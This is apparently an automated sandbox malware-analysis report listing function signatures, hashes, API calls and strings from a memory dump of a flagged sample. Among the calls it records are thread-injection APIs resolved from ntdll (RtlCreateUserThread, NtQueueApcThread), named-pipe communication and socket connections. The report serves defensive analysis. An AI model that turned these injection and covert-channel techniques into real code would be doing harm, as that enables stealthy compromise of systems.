                            • Opcode ID: 29413c21cf015658473e04e7f3fc3de74da2b1e964dc8f3f4121e26d4ac5bcb0
                            • Instruction ID: 995966c726870662a57c23daeadeacdebacf52557275ad081aa40bcf98448959
                            • Opcode Fuzzy Hash: 29413c21cf015658473e04e7f3fc3de74da2b1e964dc8f3f4121e26d4ac5bcb0
                            • Instruction Fuzzy Hash: A211A276900318FFDB107BE49C4ADEE3B69EB48B60F24041AF616D6181EA34C9458BB4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset
                            • String ID: %s&%s=%s$?%s=%s
                            • API String ID: 444161222-3403399194
                            • Opcode ID: d241f453815a1fbcc23cc37b66e79076997938f7731550cc7e5f521cc009b867
                            • Instruction ID: e885b87c2f634e1c4f006ba218a90456a791e56a47f31f716ae71b394039dbb8
                            • Opcode Fuzzy Hash: d241f453815a1fbcc23cc37b66e79076997938f7731550cc7e5f521cc009b867
                            • Instruction Fuzzy Hash: C501D1B1104240EBDB11AE50CC81F9BB768EF85710F844459FA426B157D631ED11DB72
                            APIs
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775C2
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775D2
                            • _malloc.LIBCMT ref: 00D707B2
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                              • Part of subcall function 00D7BF1C: __time64.LIBCMT ref: 00D7BF28
                              • Part of subcall function 00D7BF1C: _malloc.LIBCMT ref: 00D7BF71
                              • Part of subcall function 00D7BF1C: _memset.LIBCMT ref: 00D7BF8F
                              • Part of subcall function 00D7BF1C: _strtok.LIBCMT ref: 00D7BFB4
                              • Part of subcall function 00D7BF1C: _strtok.LIBCMT ref: 00D7BFE6
                              • Part of subcall function 00D7503E: __time64.LIBCMT ref: 00D7504B
                            • _malloc.LIBCMT ref: 00D70886
                            • __snprintf.LIBCMT ref: 00D708E8
                            • __snprintf.LIBCMT ref: 00D70907
                            • __snprintf.LIBCMT ref: 00D70925
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__snprintf$__time64_strtok$_memset
                            • String ID:
                            • API String ID: 1029070994-0
                            • Opcode ID: e62a893cc577735261ef7e8c98a4b6d1345dbb26b02058c741189192587c7579
                            • Instruction ID: 907c56e80800eca6ef5cfeaa85689010c8be0a398fbc72828ebc8c39a68915b0
                            • Opcode Fuzzy Hash: e62a893cc577735261ef7e8c98a4b6d1345dbb26b02058c741189192587c7579
                            • Instruction Fuzzy Hash: F691E571504340ABE6217B749C07B2F7AA5EF85720F14891EF68C9A1D3FB75CC408AB6
                            APIs
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775C2
                              • Part of subcall function 00D775BC: _malloc.LIBCMT ref: 00D775D2
                            • _memset.LIBCMT ref: 00D7B7CE
                              • Part of subcall function 00D7BBBA: _memset.LIBCMT ref: 00D7BCB6
                            • _malloc.LIBCMT ref: 00D7B7E1
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                            • _memset.LIBCMT ref: 00D7B7F3
                            • _malloc.LIBCMT ref: 00D7B9CF
                            • _memset.LIBCMT ref: 00D7BA61
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc_memset
                            • String ID:
                            • API String ID: 4137368368-0
                            • Opcode ID: f9c874aefb29a918ebe8d89783b013946a3c117d743d1f6f25c12c717f7541be
                            • Instruction ID: 01b003dba2702916e4d81d72a0017e27d17984395204186cbaa10f0af61cbd91
                            • Opcode Fuzzy Hash: f9c874aefb29a918ebe8d89783b013946a3c117d743d1f6f25c12c717f7541be
                            • Instruction Fuzzy Hash: F481E6729083106AD624BB24DC86B6FB7E9EF88721F11881FF59C9B181FB74D9448772
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintfhtonl
                            • String ID:
                            • API String ID: 3121112697-0
                            • Opcode ID: cb5f096bf3fad2b11918b14d55575474077282c1f9ba5e56f200f138876ab51a
                            • Instruction ID: 7d8dc72c0230073ffc76bb45c45316b56280a21f0c5ac98960449a853b1727eb
                            • Opcode Fuzzy Hash: cb5f096bf3fad2b11918b14d55575474077282c1f9ba5e56f200f138876ab51a
                            • Instruction Fuzzy Hash: 93118EBA801618FFDB12AFA4DC42EEE7BA8EF44350F14446AF90197141EB309B01DBB5
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintfhtonl
                            • String ID:
                            • API String ID: 3121112697-0
                            • Opcode ID: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
                            • Instruction ID: 7d8dc72c0230073ffc76bb45c45316b56280a21f0c5ac98960449a853b1727eb
                            • Opcode Fuzzy Hash: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
                            • Instruction Fuzzy Hash: 93118EBA801618FFDB12AFA4DC42EEE7BA8EF44350F14446AF90197141EB309B01DBB5
                            APIs
                            • _memset.LIBCMT ref: 00D753C6
                            • _memset.LIBCMT ref: 00D753D2
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754C4
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754CF
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754DB
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754E6
                              • Part of subcall function 00D75472: _rand.LIBCMT ref: 00D75544
                            • __snprintf.LIBCMT ref: 00D7542E
                            • _memset.LIBCMT ref: 00D7544C
                            • _memset.LIBCMT ref: 00D75457
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$__snprintf_rand
                            • String ID:
                            • API String ID: 4266533377-0
                            • Opcode ID: 009c693c855a16ac8fd6041bb0bec3bef12f42173df92b8ba1fd06714240f90e
                            • Instruction ID: 6ad47add5e8a0f1849304895e22ea008dbe2cc67cc9e35a23a06ff70545032c3
                            • Opcode Fuzzy Hash: 009c693c855a16ac8fd6041bb0bec3bef12f42173df92b8ba1fd06714240f90e
                            • Instruction Fuzzy Hash: 98219D31800500BBCF15AF14DC46F9B3B69EF86714F288090FD046B26AE6B1ED61CBB6
                            APIs
                            • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00DB4B75,?), ref: 00DB4AA4
                            • GetLastError.KERNEL32(?,?,00DB9320), ref: 00DB4AB4
                            • GetLastError.KERNEL32(?,?,00DB9320), ref: 00DB4ACE
                              • Part of subcall function 00DB4870: _memset.LIBCMT ref: 00DB489E
                              • Part of subcall function 00DB4870: _memset.LIBCMT ref: 00DB48BA
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,?,00000011,00DB4B75,?,?), ref: 00DB4AF3
                            • GetLastError.KERNEL32(?,?,00DB9320), ref: 00DB4AFD
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CreateProcess_memset$User
                            • String ID:
                            • API String ID: 3779600536-0
                            • Opcode ID: b152c126b3ff5e43fff5ebb64b1531b8ce75f194268a06b6f90647a59fe96cb7
                            • Instruction ID: 55680a969a2d1faa51f6f1e410ed1f9e8328033f5f93be7945c7d829b29009eb
                            • Opcode Fuzzy Hash: b152c126b3ff5e43fff5ebb64b1531b8ce75f194268a06b6f90647a59fe96cb7
                            • Instruction Fuzzy Hash: 8F112A35141740FEDB329FA29C48E677BB9EBCAB19B24481EF293C1562D7218450DB34
                            APIs
                            • GetLastError.KERNEL32(?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB71EC
                            • WaitNamedPipeA.KERNEL32(00DB37B2,00002710), ref: 00DB7201
                            • SetNamedPipeHandleState.KERNEL32(?,00DB37B2,00000000,00000000,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB722F
                            • DisconnectNamedPipe.KERNEL32(?,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB723B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$DisconnectErrorHandleLastStateWait
                            • String ID:
                            • API String ID: 2058620245-0
                            • Opcode ID: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction ID: 5d879dbda8bca38238056e8fd721918c3aea5e2bb28941ac8e71e6d78aef1717
                            • Opcode Fuzzy Hash: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction Fuzzy Hash: 93115E71218214FFEB105B64DC09FBB3BADEF86715F10056BF916D61A0E7709D408A75
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB8DD8
                            • GetTickCount.KERNEL32 ref: 00DB8DF0
                            • shutdown.WS2_32(00000000,00000002), ref: 00DB8E0B
                            • shutdown.WS2_32(00000000,00000002), ref: 00DB8E18
                            • closesocket.WS2_32(00000000), ref: 00DB8E1D
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTickshutdown$closesocket
                            • String ID:
                            • API String ID: 3414035747-0
                            • Opcode ID: e648d81ad432562b11f5d78aa775d84032beb3a980eb177d2e375d1165265f1d
                            • Instruction ID: a4676d54291d02a1e622f39bba19d72c204595e4385f3df1b2a1c52ffb94ec41
                            • Opcode Fuzzy Hash: e648d81ad432562b11f5d78aa775d84032beb3a980eb177d2e375d1165265f1d
                            • Instruction Fuzzy Hash: 6B116D31600711CFDB316F25D844A56B7E8FF14726B598A1FE88793690EB31EC40EAB0
                            APIs
                            • __getptd.LIBCMT ref: 00DD0B2A
                              • Part of subcall function 00DCD797: __getptd_noexit.LIBCMT ref: 00DCD79A
                              • Part of subcall function 00DCD797: __amsg_exit.LIBCMT ref: 00DCD7A7
                            • __amsg_exit.LIBCMT ref: 00DD0B4A
                            • __lock.LIBCMT ref: 00DD0B5A
                            • InterlockedDecrement.KERNEL32(?), ref: 00DD0B77
                            • InterlockedIncrement.KERNEL32(010F1658), ref: 00DD0BA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 79846ed2f038d75640f027a51c1cc11113c9686a040b3b89f8f2f6866cd38324
                            • Instruction ID: 02a534a5c1651b2e959804ef2d8cc5581052e3f3a8fd5c51ee6a167de8b684ba
                            • Opcode Fuzzy Hash: 79846ed2f038d75640f027a51c1cc11113c9686a040b3b89f8f2f6866cd38324
                            • Instruction Fuzzy Hash: 0D01C432905B52DBDB10BB64E845B5DBB60FF40728F16005BF408A7380CB34A941CBF5
                            APIs
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DB3622
                            • gethostbyname.WS2_32(?), ref: 00DB3636
                            • htons.WS2_32(?), ref: 00DB365F
                            • connect.WS2_32(00000000,?,00000010), ref: 00DB366F
                            • closesocket.WS2_32(00000000), ref: 00DB3679
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: closesocketconnectgethostbynamehtonssocket
                            • String ID:
                            • API String ID: 530611402-0
                            • Opcode ID: 9641cfb47082cf249cdf01a0311c87404ee51f5d4bd888ba294c073b903a0ca5
                            • Instruction ID: 03fd88bdfef91de2f183f346468164cb2bf7f29c292e31ec426390afa36e4651
                            • Opcode Fuzzy Hash: 9641cfb47082cf249cdf01a0311c87404ee51f5d4bd888ba294c073b903a0ca5
                            • Instruction Fuzzy Hash: 25F0A935904154B9DB1077A89C06FEE7768DF04720F054256FD619A3D2F6B0DA01A3B9
                            APIs
                            • _malloc.LIBCMT ref: 00D7E076
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                            • _malloc.LIBCMT ref: 00D7E083
                            • _malloc.LIBCMT ref: 00D7E09E
                            • __snprintf.LIBCMT ref: 00D7E0B1
                            • _malloc.LIBCMT ref: 00D7E0D0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__snprintf
                            • String ID:
                            • API String ID: 1839626857-0
                            • Opcode ID: 60909d306269a7eecaa14b08a4ba8db20eb602b3f16b7d79ac9f69fbaa477fbb
                            • Instruction ID: ca55f284f1373cd0eb83c4d0a2b407d31dc94a10c01c75dcaf27feab60d7af6d
                            • Opcode Fuzzy Hash: 60909d306269a7eecaa14b08a4ba8db20eb602b3f16b7d79ac9f69fbaa477fbb
                            • Instruction Fuzzy Hash: 75016D70904304AFD710AF7DCC85D96BBE9EF45B50B108829F489CB201DA74E9048BB0
                            APIs
                            • __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DCA8AA: __mtinitlocknum.LIBCMT ref: 00DCA8C0
                              • Part of subcall function 00DCA8AA: __amsg_exit.LIBCMT ref: 00DCA8CC
                              • Part of subcall function 00DCA8AA: EnterCriticalSection.KERNEL32(00000000,00000000,?,00DCD842,0000000D,00DE3748,00000008,00DCD939,00000000,?,00DCA4DC,00000000,?,?,?,00DCA53F), ref: 00DCA8D4
                            • ___sbh_find_block.LIBCMT ref: 00DC874B
                            • ___sbh_free_block.LIBCMT ref: 00DC875A
                            • HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                            • GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 2714421763-0
                            • Opcode ID: 053a01f93b52186d4cef23e8829c127f682d9f5161bb8fae5ae50e1db949a0ce
                            • Instruction ID: 0cc592fe899219b58e789432d132df80554d2ec84c2e88833dfba4fecd8e50ea
                            • Opcode Fuzzy Hash: 053a01f93b52186d4cef23e8829c127f682d9f5161bb8fae5ae50e1db949a0ce
                            • Instruction Fuzzy Hash: FC017C3180134BEADF207BB49C4AF5A7660EF00325F34421EF010A71D1EF388941ABB5
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB7969
                            • GetTickCount.KERNEL32 ref: 00DB7970
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00DB7983
                            • Sleep.KERNEL32(0000000A), ref: 00DB7994
                            • GetTickCount.KERNEL32 ref: 00DB799A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$NamedPeekPipeSleep
                            • String ID:
                            • API String ID: 1593283408-0
                            • Opcode ID: e33b8ee4d509cbaa7e22547efe213dc07548808b1da4a93eff5061643f006acd
                            • Instruction ID: da5f1ddd6e713d437e3e828795ee4402d2e77c88975a00f47b9491af52a409f4
                            • Opcode Fuzzy Hash: e33b8ee4d509cbaa7e22547efe213dc07548808b1da4a93eff5061643f006acd
                            • Instruction Fuzzy Hash: 28F08272A1561CFFEF015BB9DC819FE779DEB842A97240437E502D2110E6709D018E71
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_strncmp
                            • String ID: abcdefghijklmnop
                            • API String ID: 3493850238-2486878355
                            • Opcode ID: a7f402e130d5f3bc8409ac211332a33f512d31577d2d744c98ca2d1b3f6222a0
                            • Instruction ID: 77f45a04e85c2a8c525cb4a31acca566186bb2177ec676f07ed7c33e3c241049
                            • Opcode Fuzzy Hash: a7f402e130d5f3bc8409ac211332a33f512d31577d2d744c98ca2d1b3f6222a0
                            • Instruction Fuzzy Hash: B741867691060ABEEB01DEB8DD41DEFB3B9EB453447140525E901F7152EA31EE0986B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $2$l
                            • API String ID: 0-3132104027
                            • Opcode ID: eb474567eacfc3d501f5e1b6ebaa72d776817f12a42b620c1f05cf73adb88cac
                            • Instruction ID: b1fb84cbc2f5422918eda8fa5628d64b176e0e3dc9642a10597da187c76c316f
                            • Opcode Fuzzy Hash: eb474567eacfc3d501f5e1b6ebaa72d776817f12a42b620c1f05cf73adb88cac
                            • Instruction Fuzzy Hash: F441D3B0814268CEDF34EE2488C93E87BB1AB15325F5811DBD199A6192C7749EC6CF71
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $2$l
                            • API String ID: 0-3132104027
                            • Opcode ID: a08bc20fbbed711a2771cefccfc8b9c6e4fe8b13b47a8aeaf76eb1eac6ba00ff
                            • Instruction ID: 68dd2f42547254771ec9991ecfe4bdf7cbbbd3b40fdb8df0bdf74deed640ed5e
                            • Opcode Fuzzy Hash: a08bc20fbbed711a2771cefccfc8b9c6e4fe8b13b47a8aeaf76eb1eac6ba00ff
                            • Instruction Fuzzy Hash: 7C41B234845268CADF34AF1888D83E87BB5AB0A725F1841DBC0E966292C7755EC7CF31
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_strncmp
                            • String ID: abcdefghijklmnop
                            • API String ID: 3493850238-2486878355
                            • Opcode ID: 0a7cddd77f77a3c14efd208771b89d3aa1c8a243f8d05003eacb4dae7584cda8
                            • Instruction ID: 520590dd50023b1bdc3d304e6cac2bf9a280b617087a317d6ac865c978bed9a5
                            • Opcode Fuzzy Hash: 0a7cddd77f77a3c14efd208771b89d3aa1c8a243f8d05003eacb4dae7584cda8
                            • Instruction Fuzzy Hash: CB31967290020AABDB01EFA8DD81DEE73ADEF55344B244525F901EB142FE31EB0987B0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset
                            • String ID: %s%s
                            • API String ID: 444161222-3438391663
                            • Opcode ID: 150cda856f10910070ed4b4f88eeaceee9300f434e588ab47c43b8c1a344e857
                            • Instruction ID: 47bc3bc7b86326fbc84c7931e0ce2241bc0dcf67c7d89c7c3f2427ea90e6e3f7
                            • Opcode Fuzzy Hash: 150cda856f10910070ed4b4f88eeaceee9300f434e588ab47c43b8c1a344e857
                            • Instruction Fuzzy Hash: D401CC71104285EFCB01DF10C894F9BBBA5EF8A710F584559FA865B262D731D908DB72
                            APIs
                            • _memset.LIBCMT ref: 00DBCA03
                            • GetCurrentProcess.KERNEL32(00DB1A51), ref: 00DBCA1D
                              • Part of subcall function 00DBC960: _memset.LIBCMT ref: 00DBC97A
                              • Part of subcall function 00DBC960: __snprintf.LIBCMT ref: 00DBC9D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$CurrentProcess__snprintf
                            • String ID: system32$syswow64
                            • API String ID: 3270679572-3098820961
                            • Opcode ID: 38057ed0a5d0da93945676376c2c123e4956c99e8dddf32fa9c786a7f94d464b
                            • Instruction ID: 8fea28c2270a03ba7e1e9cf78de2879486e8b438fc82fbf0cc374bb101d827e2
                            • Opcode Fuzzy Hash: 38057ed0a5d0da93945676376c2c123e4956c99e8dddf32fa9c786a7f94d464b
                            • Instruction Fuzzy Hash: F8F0BE31685308AEF704B750BC47FAA3798EF01754F08101AF80AAA3C2EA6165008579
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,RtlCreateUserThread,00000000,?,?,00DB62F7,00000000,00000000,00000000,00000000,?,00DB65ED,00000000,00000000,00000000), ref: 00DB6BE5
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6BEC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlCreateUserThread$ntdll.dll
                            • API String ID: 1646373207-2935400652
                            • Opcode ID: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction ID: b85cc6219aaa65d139d77ac08624d287af88fe2b740690f27df781cd01419bdb
                            • Opcode Fuzzy Hash: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction Fuzzy Hash: D9F03076902224FBCF11AFE18C098DE7F69EB04B10B558516F51692150D7749B54DBA0
                            APIs
                            • GetModuleHandleA.KERNEL32(00DE16AC,00DE16B8), ref: 00DB6BE5
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6BEC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlCreateUserThread$ntdll.dll
                            • API String ID: 1646373207-2935400652
                            • Opcode ID: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction ID: b85cc6219aaa65d139d77ac08624d287af88fe2b740690f27df781cd01419bdb
                            • Opcode Fuzzy Hash: ea4727518f9e494092efa8d2058f1ba9b0c7448335bf6eba6cd1e4673076cf77
                            • Instruction Fuzzy Hash: D9F03076902224FBCF11AFE18C098DE7F69EB04B10B558516F51692150D7749B54DBA0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,?,00DB63DD,00000000,00000000), ref: 00DB67FE
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6805
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: NtQueueApcThread$ntdll
                            • API String ID: 1646373207-1374908105
                            • Opcode ID: 141f568c23265b4727e7a3b13ffd6f2c550093efd5daaae3e86fd1c6eb7af968
                            • Instruction ID: c1f397498e0adfdea73730af60399a82e1d460b80e5d8c4138fff79b02db22b3
                            • Opcode Fuzzy Hash: 141f568c23265b4727e7a3b13ffd6f2c550093efd5daaae3e86fd1c6eb7af968
                            • Instruction Fuzzy Hash: ECE0DF3E340705BBDF202FB5AC02B9E3B99AF04B64F10852AF52EC50E0EB32D4505A34
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf_memset
                            • String ID: %s&%s$?%s
                            • API String ID: 2657849664-1750478248
                            • Opcode ID: 9dcc7895b22ee8def29aa9ce0e0ec205ca7744b3a2a839994267200949d5a36d
                            • Instruction ID: c1a1ea452f8bed48b6788424ad143bfdad72c7428b35ef91f3acc8b39f187e7a
                            • Opcode Fuzzy Hash: 9dcc7895b22ee8def29aa9ce0e0ec205ca7744b3a2a839994267200949d5a36d
                            • Instruction Fuzzy Hash: 5BF030B5514384FFD710EB54CD82FABB7ACEB85700F84555EBA4256142E630D904DB32
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,00DB80DF), ref: 00DB4366
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB436D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
